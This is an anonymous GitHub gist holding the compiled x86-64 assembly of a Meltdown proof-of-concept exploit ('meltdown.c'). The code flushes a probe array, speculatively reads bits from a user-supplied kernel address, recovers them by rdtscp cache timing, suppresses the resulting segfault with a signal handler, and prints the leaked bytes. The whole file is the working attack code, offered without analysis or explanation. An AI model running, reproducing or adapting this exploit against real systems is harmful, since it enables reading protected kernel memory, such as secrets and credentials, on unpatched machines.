Created
January 5, 2018 12:14
-
-
Save anonymous/3eca6a8123879737492b6b216e5d4703 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .file "meltdown.c" | |
| .local target_array | |
| .comm target_array,1024,32 | |
| .text | |
| .globl clflush_target | |
| .type clflush_target, @function | |
| clflush_target: | |
| .LFB3921: | |
| .cfi_startproc | |
| pushq %rbp | |
| .cfi_def_cfa_offset 16 | |
| .cfi_offset 6, -16 | |
| movq %rsp, %rbp | |
| .cfi_def_cfa_register 6 | |
| movl $0, -12(%rbp) | |
| jmp .L2 | |
| .L3: | |
| movl -12(%rbp), %eax | |
| sall $9, %eax | |
| movslq %eax, %rdx | |
| leaq target_array(%rip), %rax | |
| addq %rdx, %rax | |
| movq %rax, -8(%rbp) | |
| movq -8(%rbp), %rax | |
| clflush (%rax) | |
| addl $1, -12(%rbp) | |
| .L2: | |
| cmpl $1, -12(%rbp) | |
| jle .L3 | |
| nop | |
| popq %rbp | |
| .cfi_def_cfa 7, 8 | |
| ret | |
| .cfi_endproc | |
| .LFE3921: | |
| .size clflush_target, .-clflush_target | |
| .globl speculate | |
| .type speculate, @function | |
| speculate: | |
| .LFB3922: | |
| .cfi_startproc | |
| pushq %rbp | |
| .cfi_def_cfa_offset 16 | |
| .cfi_offset 6, -16 | |
| movq %rsp, %rbp | |
| .cfi_def_cfa_register 6 | |
| pushq %rbx | |
| .cfi_offset 3, -24 | |
| movq %rdi, -16(%rbp) | |
| movl %esi, %eax | |
| movb %al, -20(%rbp) | |
| movq -16(%rbp), %rdx | |
| movzbl -20(%rbp), %ecx | |
| #APP | |
| # 39 "meltdown.c" 1 | |
| lea target_array(%rip), %rbx | |
| 1: | |
| .rept 300 | |
| add $0x141, %rax | |
| .endr | |
| movb (%rdx), %al | |
| ror %cl, %rax | |
| and $1, %rax | |
| jz 1b | |
| shl $9, %rax | |
| movq (%rbx, %rax, 1), %rbx | |
| stopspeculate: nop | |
| # 0 "" 2 | |
| #NO_APP | |
| nop | |
| popq %rbx | |
| popq %rbp | |
| .cfi_def_cfa 7, 8 | |
| ret | |
| .cfi_endproc | |
| .LFE3922: | |
| .size speculate, .-speculate | |
| .type get_access_time, @function | |
| get_access_time: | |
| .LFB3923: | |
| .cfi_startproc | |
| pushq %rbp | |
| .cfi_def_cfa_offset 16 | |
| .cfi_offset 6, -16 | |
| movq %rsp, %rbp | |
| .cfi_def_cfa_register 6 | |
| subq $64, %rsp | |
| movq %rdi, -56(%rbp) | |
| movq %fs:40, %rax | |
| movq %rax, -8(%rbp) | |
| xorl %eax, %eax | |
| leaq -40(%rbp), %rax | |
| movq %rax, -16(%rbp) | |
| rdtscp | |
| movl %ecx, %esi | |
| movq -16(%rbp), %rcx | |
| movl %esi, (%rcx) | |
| salq $32, %rdx | |
| orq %rdx, %rax | |
| movl %eax, -32(%rbp) | |
| movq -56(%rbp), %rax | |
| movzbl (%rax), %eax | |
| movsbl %al, %eax | |
| movl %eax, -36(%rbp) | |
| leaq -40(%rbp), %rax | |
| movq %rax, -24(%rbp) | |
| rdtscp | |
| movl %ecx, %esi | |
| movq -24(%rbp), %rcx | |
| movl %esi, (%rcx) | |
| salq $32, %rdx | |
| orq %rdx, %rax | |
| movl %eax, -28(%rbp) | |
| movl -28(%rbp), %eax | |
| subl -32(%rbp), %eax | |
| movq -8(%rbp), %rdi | |
| xorq %fs:40, %rdi | |
| je .L9 | |
| call __stack_chk_fail@PLT | |
| .L9: | |
| leave | |
| .cfi_def_cfa 7, 8 | |
| ret | |
| .cfi_endproc | |
| .LFE3923: | |
| .size get_access_time, .-get_access_time | |
| .data | |
| .align 4 | |
| .type CACHE_HIT_THRESHOLD, @object | |
| .size CACHE_HIT_THRESHOLD, 4 | |
| CACHE_HIT_THRESHOLD: | |
| .long 80 | |
| .local hist | |
| .comm hist,8,8 | |
| .text | |
| .globl check | |
| .type check, @function | |
| check: | |
| .LFB3924: | |
| .cfi_startproc | |
| pushq %rbp | |
| .cfi_def_cfa_offset 16 | |
| .cfi_offset 6, -16 | |
| movq %rsp, %rbp | |
| .cfi_def_cfa_register 6 | |
| subq $16, %rsp | |
| movl $0, -16(%rbp) | |
| jmp .L11 | |
| .L13: | |
| movl -16(%rbp), %eax | |
| sall $9, %eax | |
| movslq %eax, %rdx | |
| leaq target_array(%rip), %rax | |
| addq %rdx, %rax | |
| movq %rax, -8(%rbp) | |
| movq -8(%rbp), %rax | |
| movq %rax, %rdi | |
| call get_access_time | |
| movl %eax, -12(%rbp) | |
| movl CACHE_HIT_THRESHOLD(%rip), %eax | |
| cmpl %eax, -12(%rbp) | |
| jg .L12 | |
| movl -16(%rbp), %eax | |
| cltq | |
| leaq 0(,%rax,4), %rdx | |
| leaq hist(%rip), %rax | |
| movl (%rdx,%rax), %eax | |
| leal 1(%rax), %ecx | |
| movl -16(%rbp), %eax | |
| cltq | |
| leaq 0(,%rax,4), %rdx | |
| leaq hist(%rip), %rax | |
| movl %ecx, (%rdx,%rax) | |
| .L12: | |
| addl $1, -16(%rbp) | |
| .L11: | |
| cmpl $1, -16(%rbp) | |
| jle .L13 | |
| nop | |
| leave | |
| .cfi_def_cfa 7, 8 | |
| ret | |
| .cfi_endproc | |
| .LFE3924: | |
| .size check, .-check | |
| .globl sigsegv | |
| .type sigsegv, @function | |
| sigsegv: | |
| .LFB3925: | |
| .cfi_startproc | |
| pushq %rbp | |
| .cfi_def_cfa_offset 16 | |
| .cfi_offset 6, -16 | |
| movq %rsp, %rbp | |
| .cfi_def_cfa_register 6 | |
| movl %edi, -20(%rbp) | |
| movq %rsi, -32(%rbp) | |
| movq %rdx, -40(%rbp) | |
| movq -40(%rbp), %rax | |
| movq %rax, -8(%rbp) | |
| leaq stopspeculate(%rip), %rdx | |
| movq -8(%rbp), %rax | |
| movq %rdx, 168(%rax) | |
| nop | |
| popq %rbp | |
| .cfi_def_cfa 7, 8 | |
| ret | |
| .cfi_endproc | |
| .LFE3925: | |
| .size sigsegv, .-sigsegv | |
| .globl set_signal | |
| .type set_signal, @function | |
| set_signal: | |
| .LFB3926: | |
| .cfi_startproc | |
| pushq %rbp | |
| .cfi_def_cfa_offset 16 | |
| .cfi_offset 6, -16 | |
| movq %rsp, %rbp | |
| .cfi_def_cfa_register 6 | |
| subq $160, %rsp | |
| movq %fs:40, %rax | |
| movq %rax, -8(%rbp) | |
| xorl %eax, %eax | |
| leaq -160(%rbp), %rdx | |
| movl $0, %eax | |
| movl $19, %ecx | |
| movq %rdx, %rdi | |
| rep stosq | |
| leaq sigsegv(%rip), %rax | |
| movq %rax, -160(%rbp) | |
| movl $4, -24(%rbp) | |
| leaq -160(%rbp), %rax | |
| movl $0, %edx | |
| movq %rax, %rsi | |
| movl $11, %edi | |
| call sigaction@PLT | |
| movq -8(%rbp), %rsi | |
| xorq %fs:40, %rsi | |
| je .L18 | |
| call __stack_chk_fail@PLT | |
| .L18: | |
| leave | |
| .cfi_def_cfa 7, 8 | |
| ret | |
| .cfi_endproc | |
| .LFE3926: | |
| .size set_signal, .-set_signal | |
| .globl readbit | |
| .type readbit, @function | |
| readbit: | |
| .LFB3927: | |
| .cfi_startproc | |
| pushq %rbp | |
| .cfi_def_cfa_offset 16 | |
| .cfi_offset 6, -16 | |
| movq %rsp, %rbp | |
| .cfi_def_cfa_register 6 | |
| subq $32, %rsp | |
| movl %edi, -20(%rbp) | |
| movq %rsi, -32(%rbp) | |
| movl %edx, %eax | |
| movb %al, -24(%rbp) | |
| movl $8, %edx | |
| movl $0, %esi | |
| leaq hist(%rip), %rdi | |
| call memset@PLT | |
| movl $0, -4(%rbp) | |
| jmp .L20 | |
| .L21: | |
| movl -20(%rbp), %eax | |
| movl $0, %ecx | |
| movl $256, %edx | |
| leaq buf.25103(%rip), %rsi | |
| movl %eax, %edi | |
| call pread@PLT | |
| call clflush_target | |
| movsbl -24(%rbp), %edx | |
| movq -32(%rbp), %rax | |
| movl %edx, %esi | |
| movq %rax, %rdi | |
| call speculate | |
| call check | |
| addl $1, -4(%rbp) | |
| .L20: | |
| cmpl $9999, -4(%rbp) | |
| jle .L21 | |
| movl 4+hist(%rip), %eax | |
| cmpl $1000, %eax | |
| jle .L22 | |
| movl $1, %eax | |
| jmp .L23 | |
| .L22: | |
| movl $0, %eax | |
| .L23: | |
| leave | |
| .cfi_def_cfa 7, 8 | |
| ret | |
| .cfi_endproc | |
| .LFE3927: | |
| .size readbit, .-readbit | |
| .globl readbyte | |
| .type readbyte, @function | |
| readbyte: | |
| .LFB3928: | |
| .cfi_startproc | |
| pushq %rbp | |
| .cfi_def_cfa_offset 16 | |
| .cfi_offset 6, -16 | |
| movq %rsp, %rbp | |
| .cfi_def_cfa_register 6 | |
| subq $32, %rsp | |
| movl %edi, -20(%rbp) | |
| movq %rsi, -32(%rbp) | |
| movl $0, -4(%rbp) | |
| movl $0, -8(%rbp) | |
| jmp .L25 | |
| .L26: | |
| movl -8(%rbp), %eax | |
| movsbl %al, %edx | |
| movq -32(%rbp), %rcx | |
| movl -20(%rbp), %eax | |
| movq %rcx, %rsi | |
| movl %eax, %edi | |
| call readbit | |
| movl %eax, %edx | |
| movl -8(%rbp), %eax | |
| movl %eax, %ecx | |
| sall %cl, %edx | |
| movl %edx, %eax | |
| orl %eax, -4(%rbp) | |
| addl $1, -8(%rbp) | |
| .L25: | |
| cmpl $7, -8(%rbp) | |
| jle .L26 | |
| movl -4(%rbp), %eax | |
| leave | |
| .cfi_def_cfa 7, 8 | |
| ret | |
| .cfi_endproc | |
| .LFE3928: | |
| .size readbyte, .-readbyte | |
| .local progname | |
| .comm progname,8,8 | |
| .section .rodata | |
| .LC0: | |
| .string "%s: [hexaddr] [size]\n" | |
| .text | |
| .globl usage | |
| .type usage, @function | |
| usage: | |
| .LFB3929: | |
| .cfi_startproc | |
| pushq %rbp | |
| .cfi_def_cfa_offset 16 | |
| .cfi_offset 6, -16 | |
| movq %rsp, %rbp | |
| .cfi_def_cfa_register 6 | |
| movq progname(%rip), %rax | |
| movq %rax, %rsi | |
| leaq .LC0(%rip), %rdi | |
| movl $0, %eax | |
| call printf@PLT | |
| movl $1, %eax | |
| popq %rbp | |
| .cfi_def_cfa 7, 8 | |
| ret | |
| .cfi_endproc | |
| .LFE3929: | |
| .size usage, .-usage | |
| .type mysqrt, @function | |
| mysqrt: | |
| .LFB3930: | |
| .cfi_startproc | |
| pushq %rbp | |
| .cfi_def_cfa_offset 16 | |
| .cfi_offset 6, -16 | |
| movq %rsp, %rbp | |
| .cfi_def_cfa_register 6 | |
| movq %rdi, -24(%rbp) | |
| movq -24(%rbp), %rax | |
| movq %rax, %rdx | |
| shrq $63, %rdx | |
| addq %rdx, %rax | |
| sarq %rax | |
| movl %eax, -12(%rbp) | |
| movl $0, -8(%rbp) | |
| movl $0, -4(%rbp) | |
| jmp .L31 | |
| .L33: | |
| movl -12(%rbp), %eax | |
| movl %eax, -8(%rbp) | |
| movl -12(%rbp), %eax | |
| movslq %eax, %rcx | |
| movq -24(%rbp), %rax | |
| cqto | |
| idivq %rcx | |
| movq %rax, %rdx | |
| movl -12(%rbp), %eax | |
| cltq | |
| addq %rdx, %rax | |
| movq %rax, %rdx | |
| shrq $63, %rdx | |
| addq %rdx, %rax | |
| sarq %rax | |
| movl %eax, -12(%rbp) | |
| .L31: | |
| movl -8(%rbp), %eax | |
| cmpl -12(%rbp), %eax | |
| je .L32 | |
| cmpl $99, -4(%rbp) | |
| jle .L33 | |
| .L32: | |
| movl -12(%rbp), %eax | |
| popq %rbp | |
| .cfi_def_cfa 7, 8 | |
| ret | |
| .cfi_endproc | |
| .LFE3930: | |
| .size mysqrt, .-mysqrt | |
| .section .rodata | |
| .align 8 | |
| .LC1: | |
| .string "cached = %ld, uncached = %ld, threshold %d\n" | |
| .text | |
| .type set_cache_hit_threshold, @function | |
| set_cache_hit_threshold: | |
| .LFB3931: | |
| .cfi_startproc | |
| pushq %rbp | |
| .cfi_def_cfa_offset 16 | |
| .cfi_offset 6, -16 | |
| movq %rsp, %rbp | |
| .cfi_def_cfa_register 6 | |
| subq $32, %rsp | |
| movq $0, -32(%rbp) | |
| movq $0, -16(%rbp) | |
| jmp .L36 | |
| .L37: | |
| leaq target_array(%rip), %rdi | |
| call get_access_time | |
| cltq | |
| addq %rax, -32(%rbp) | |
| addq $1, -16(%rbp) | |
| .L36: | |
| cmpq $999999, -16(%rbp) | |
| jle .L37 | |
| movq $0, -32(%rbp) | |
| movq $0, -16(%rbp) | |
| jmp .L38 | |
| .L39: | |
| leaq target_array(%rip), %rdi | |
| call get_access_time | |
| cltq | |
| addq %rax, -32(%rbp) | |
| addq $1, -16(%rbp) | |
| .L38: | |
| cmpq $999999, -16(%rbp) | |
| jle .L39 | |
| movq $0, -24(%rbp) | |
| movq $0, -16(%rbp) | |
| jmp .L40 | |
| .L41: | |
| leaq target_array(%rip), %rax | |
| movq %rax, -8(%rbp) | |
| movq -8(%rbp), %rax | |
| clflush (%rax) | |
| leaq target_array(%rip), %rdi | |
| call get_access_time | |
| cltq | |
| addq %rax, -24(%rbp) | |
| addq $1, -16(%rbp) | |
| .L40: | |
| cmpq $999999, -16(%rbp) | |
| jle .L41 | |
| movq -32(%rbp), %rcx | |
| movabsq $4835703278458516699, %rdx | |
| movq %rcx, %rax | |
| imulq %rdx | |
| sarq $18, %rdx | |
| movq %rcx, %rax | |
| sarq $63, %rax | |
| subq %rax, %rdx | |
| movq %rdx, %rax | |
| movq %rax, -32(%rbp) | |
| movq -24(%rbp), %rcx | |
| movabsq $4835703278458516699, %rdx | |
| movq %rcx, %rax | |
| imulq %rdx | |
| sarq $18, %rdx | |
| movq %rcx, %rax | |
| sarq $63, %rax | |
| subq %rax, %rdx | |
| movq %rdx, %rax | |
| movq %rax, -24(%rbp) | |
| movq -32(%rbp), %rax | |
| imulq -24(%rbp), %rax | |
| movq %rax, %rdi | |
| call mysqrt | |
| movl %eax, CACHE_HIT_THRESHOLD(%rip) | |
| movl CACHE_HIT_THRESHOLD(%rip), %ecx | |
| movq -24(%rbp), %rdx | |
| movq -32(%rbp), %rax | |
| movq %rax, %rsi | |
| leaq .LC1(%rip), %rdi | |
| movl $0, %eax | |
| call printf@PLT | |
| leave | |
| .cfi_def_cfa 7, 8 | |
| ret | |
| .cfi_endproc | |
| .LFE3931: | |
| .size set_cache_hit_threshold, .-set_cache_hit_threshold | |
| .section .rodata | |
| .LC2: | |
| .string "%lx" | |
| .LC3: | |
| .string "/proc/version" | |
| .LC4: | |
| .string "%lx = %c %x\n" | |
| .text | |
| .globl main | |
| .type main, @function | |
| main: | |
| .LFB3932: | |
| .cfi_startproc | |
| pushq %rbp | |
| .cfi_def_cfa_offset 16 | |
| .cfi_offset 6, -16 | |
| movq %rsp, %rbp | |
| .cfi_def_cfa_register 6 | |
| subq $64, %rsp | |
| movl %edi, -52(%rbp) | |
| movq %rsi, -64(%rbp) | |
| movq %fs:40, %rax | |
| movq %rax, -8(%rbp) | |
| xorl %eax, %eax | |
| movq -64(%rbp), %rax | |
| movq (%rax), %rax | |
| movq %rax, progname(%rip) | |
| cmpl $2, -52(%rbp) | |
| jg .L44 | |
| call usage | |
| jmp .L50 | |
| .L44: | |
| movq -64(%rbp), %rax | |
| addq $8, %rax | |
| movq (%rax), %rax | |
| leaq -24(%rbp), %rdx | |
| leaq .LC2(%rip), %rsi | |
| movq %rax, %rdi | |
| movl $0, %eax | |
| call sscanf@PLT | |
| cmpl $1, %eax | |
| je .L46 | |
| call usage | |
| jmp .L50 | |
| .L46: | |
| movq -64(%rbp), %rax | |
| addq $16, %rax | |
| movq (%rax), %rax | |
| leaq -16(%rbp), %rdx | |
| leaq .LC2(%rip), %rsi | |
| movq %rax, %rdi | |
| movl $0, %eax | |
| call sscanf@PLT | |
| cmpl $1, %eax | |
| je .L47 | |
| call usage | |
| jmp .L50 | |
| .L47: | |
| movl $1024, %edx | |
| movl $1, %esi | |
| leaq target_array(%rip), %rdi | |
| call memset@PLT | |
| call set_signal | |
| movl %eax, -32(%rbp) | |
| call set_cache_hit_threshold | |
| movl $0, %esi | |
| leaq .LC3(%rip), %rdi | |
| movl $0, %eax | |
| call open@PLT | |
| movl %eax, -28(%rbp) | |
| movl $0, -36(%rbp) | |
| jmp .L48 | |
| .L49: | |
| movq -24(%rbp), %rdx | |
| movl -28(%rbp), %eax | |
| movq %rdx, %rsi | |
| movl %eax, %edi | |
| call readbyte | |
| movl %eax, -32(%rbp) | |
| movq -24(%rbp), %rax | |
| movl -32(%rbp), %ecx | |
| movl -32(%rbp), %edx | |
| movq %rax, %rsi | |
| leaq .LC4(%rip), %rdi | |
| movl $0, %eax | |
| call printf@PLT | |
| movq -24(%rbp), %rax | |
| addq $1, %rax | |
| movq %rax, -24(%rbp) | |
| addl $1, -36(%rbp) | |
| .L48: | |
| movl -36(%rbp), %eax | |
| movslq %eax, %rdx | |
| movq -16(%rbp), %rax | |
| cmpq %rax, %rdx | |
| jb .L49 | |
| movl -28(%rbp), %eax | |
| movl %eax, %edi | |
| call close@PLT | |
| movl $0, %eax | |
| .L50: | |
| movq -8(%rbp), %rcx | |
| xorq %fs:40, %rcx | |
| je .L51 | |
| call __stack_chk_fail@PLT | |
| .L51: | |
| leave | |
| .cfi_def_cfa 7, 8 | |
| ret | |
| .cfi_endproc | |
| .LFE3932: | |
| .size main, .-main | |
| .local buf.25103 | |
| .comm buf.25103,256,32 | |
| .ident "GCC: (GNU) 7.2.1 20171128" | |
| .section .note.GNU-stack,"",@progbits |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment